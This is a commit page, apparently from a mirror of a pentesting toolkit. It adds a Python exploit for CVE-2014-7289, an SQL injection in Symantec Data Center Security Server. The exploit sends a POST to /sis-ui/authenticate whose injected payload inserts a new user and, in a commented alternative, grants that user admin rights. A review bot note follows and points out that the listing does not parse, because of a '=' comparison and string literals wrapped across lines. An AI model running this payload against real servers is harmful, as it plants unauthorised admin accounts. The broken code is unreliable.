mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-08 01:35:11 -04:00
sqli exploit example forCVE-2014-7289
parent
3b64acb80e
commit
94edfc7bb0
1 changed files with 43 additions and 0 deletions
43
Web_Security/SQLi/CVE-2014-7289_exploit.py
Normal file
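--- a/Web_Security/SQLi/CVE-2014-7289_exploit.py
+++ b/Web_Security/SQLi/CVE-2014-7289_exploit.py
@@ -0,0 +1,43 @@
+#!/bin/env python
+# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
+
+
+import httplib
+def send_request(host,data):
+params = data
+headers = {"AppFire-Format-Version": "1.0",
+"AppFire-Charset": "UTF-16LE",
+"Content-Type":"application/x-appfire",
+"User-Agent":"Java/1.7.0_45",
+}
+conn = httplib.HTTPSConnection(host)
+conn.request("POST", "/sis-ui/authenticate", params, headers)
+response = conn.getresponse()
+data=response.read()
+conn.close()
+return response,data
+
+if __name__ = '__main__'
+header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
+data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
+PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
+PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
+VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
+'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
+07:13:23', '1', '0', '0',
+'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
+-- '' " # add user to USR table
+#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
+ROLERID) VALUES (1504, 1); -- " # add user to admin group
+data+="\r\nan=Symantec Data Center Security Server
+6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
+data = data.encode('utf-16le')
+
+eof_flag="\nEOF_FLAG\n"
+header = header %(len(data))
+payload=header+data+eof_flag
+
+response,data = send_request("<host>:4443",payload)
+
+print data.decode('utf-16le')
+print response.status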
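Review bot: The new file carries no header comment saying what it demonstrates; the only context is the seclists URL on its second line, while the injection point (the `un=` field of the POST to `/sis-ui/authenticate`) and the affected product named in the payload (`Symantec Data Center Security Server 6.0`) are buried inside string literals. A short comment under the reference line would make that reviewable, for example `# Advisory PoC for CVE-2014-7289: SQL injection through the un= field of POST /sis-ui/authenticate (body is UTF-16LE, Content-Type application/x-appfire)`. The same comment should state that the listing is an excerpt copied from the advisory and is not valid Python as committed, since `if __name__ = '__main__'` and the string literals wrapped across several lines do not parse. For readers on the defending side it is worth adding what the request leaves behind: a decoded `un` value containing a quote followed by SQL, and unexpected rows in the `USR` and `ROLEMAP` tables named in the payload.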